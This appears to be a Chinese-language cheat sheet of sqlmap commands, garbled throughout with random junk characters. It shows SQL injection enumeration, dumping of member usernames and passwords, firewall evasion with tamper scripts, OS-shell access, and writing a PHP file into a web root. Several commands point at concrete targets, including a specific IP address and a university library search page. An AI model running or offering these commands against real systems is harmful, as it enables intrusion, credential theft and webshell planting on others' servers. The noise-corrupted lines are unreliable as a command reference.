/pentest/database/sqlmap' W( M& J* w4 W6 d- b
9 V7 j$ F. W- b- V f' L$ o0 W$ Y
update :::::> in the folder after execute following order : svn update3 r; U U$ q& i @
1 y& S3 V9 d* C+ z4 J
sqlmap.py -r 1.txt --current-db6 Y; N% h5 o4 {9 G
4 Z& b/ R m: Q# Y, Z* `v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”0 t' [( X. e/ H1 t0 k9 o1 t. k' U
6 E/ r. x& G2 I6 \7 O0 g==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) 0 h1 ]/ ]( _( X6 A4 I
猜解数据库
6 n5 z. }# s& @./sqlmap.py -u "injection-url" --dbs) \: p) K. _/ h3 f) _/ J5 u
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py") g4 h4 E, z: u" [) V' ~
$ C; I6 x/ B4 o$ ?1 {% f6 a$ `猜解表名
' j4 K* m2 x/ {! b./sqlmap.py -u "injection-url" -D database_name --tables
6 P) B8 H( L& Q; k
; m' g2 G" Q/ K# Y2 Hsqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"* @! p& B ~0 y$ S, v
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
+ ]* X1 o" K1 E) z8 ^; i0 x2 S/ O& J
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump5 a p# _# j2 Y- w0 e2 E
. P3 q* T' R. u/ q5 R5 e8 H
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"0 B1 P9 ]% K2 Q% M: |# u- ^
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"$ Z7 p6 F% n8 f
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" 4 i) O2 y* f& Y
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
( Q% u) Z3 }( W' w. w$ Y% z, ?9 K: o. f- o% H2 `
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py", {0 @' x" a" V( f% R& R
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
5 X0 p! s2 L2 L. L- o4 r# ]sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"( M9 t" K$ ^0 S; y, G
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"# [1 O4 }* W/ s
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump- U8 j: e0 n1 l8 g2 @3 z' I
- K w) o1 U* d) j2 K2 P6 q/ |sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了" u3 u% L) M$ h
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"6 e. t* e- I8 t9 O3 w2 Z2 ^, e4 P
6 ]* q. v2 O* Q: E5 ?/ O3 ]
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst", A m( D: t1 O) V `
猜解列名
7 D, v: A% r, y4 l" k2 n./sqlmap.py -u "injection-url" -D database_name -T table_name --columns0 n4 Q, q, {- G6 F7 g( p
$ R( V) Y$ p1 B, p' p3 Fsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
% w- `, I5 \, B0 k9 ?" o/ Isqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
# g, m, W- x0 |/ M3 rsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"' U1 O/ }/ b! V1 f
, J! J- |5 H$ l- Z$ t+ l% [
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
1 A! c8 P3 K) Q+ P# X; ]- X&submit=Go
5 n ]3 L# m4 j8 } B) F* i猜解值8 ?1 Z2 R* H* I& l6 d f9 E$ q
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump* y9 L" h' i1 V G9 C! ]0 r
========================================================! h: A! C g% D |; }
搜索表名中包括mana字符的3 D+ F8 L" Q" K: ?) ]
/sqlmap.py -u "injection-url" -T mana --search
+ s- W' u, q8 [/ v返回一个交互式sql shell, J8 a8 _6 c& l4 `7 |4 I
/sqlmap.py -u "injection-url" --sql-shell
' d, ~# q) a8 a5 d读取指定文件(需权限)0 B; @# P5 g) n! c' b; e5 a
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"' E, v% I: R. A2 Z
查看当前 用户 及 数据库
4 L; L% B% Z/ s! g) M# y/sqlmap.py -u "injection-url" --current-user --current-db
) z" _" Q. L" U& S( t. k本地文件 写入 远程目标绝对路径
9 `# l9 A$ t- e Q) h( K w/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
6 ]+ R4 h; ?0 J1 B8 V+ |7 m& {sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
, {6 C. {" Y5 E/ k }7 ?9 v1 ?( `9 T5 [) m: F
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
2 `9 }: J% E) V6 Q1 n& m; |. z* u! P查看某用的权限! l6 m9 u+ `3 n2 |. X
/sqlmap.py -u "injection-url" --privileges -U root
" M$ p' [" ~) {' V+ c# R4 V查看当前用户是否为dba9 v; T7 A! q$ F7 x/ O
/sqlmap.py -u "injection-url" --is-dba
) X$ o) H! g) Z, s6 i读取所有数据库用户或指定数据库用户的密码* f! S3 {( E, J$ H
sqlmap.py -r 1.txt --users --passwords
* i2 S k4 M1 z) q, W- Z1 n4 Qsqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
" Y+ w K0 q, h/ j4 b8 j# T
' @$ Q$ y& w/ Z2 w. R/sqlmap.py -u "injection-url" --passwords -U root
. q8 Q8 {; [. ~: {: k! z1 U0 Q( {1 x* \
--start&&--stop 与 --first&&--last 的区别
$ t$ [* x8 c0 `8 N$ I) N/ G/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)1 r& m5 Y. n" ?
1 L( Y$ ^/ z$ v/ Y
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
3 ]/ l: j" R( w5 Q/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
+ Z! }" E2 U, y" ]/ r; Y" e- q/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
4 b: p8 m* ]" B/ A) M4 N- S! y$ p! L( [3 S- G$ w7 X/ }
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)- g& N' o+ {) P- P! L& T/ ~
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip") N; u7 j8 Z* Q, t( g
9 a4 `; N& d2 g; `! t |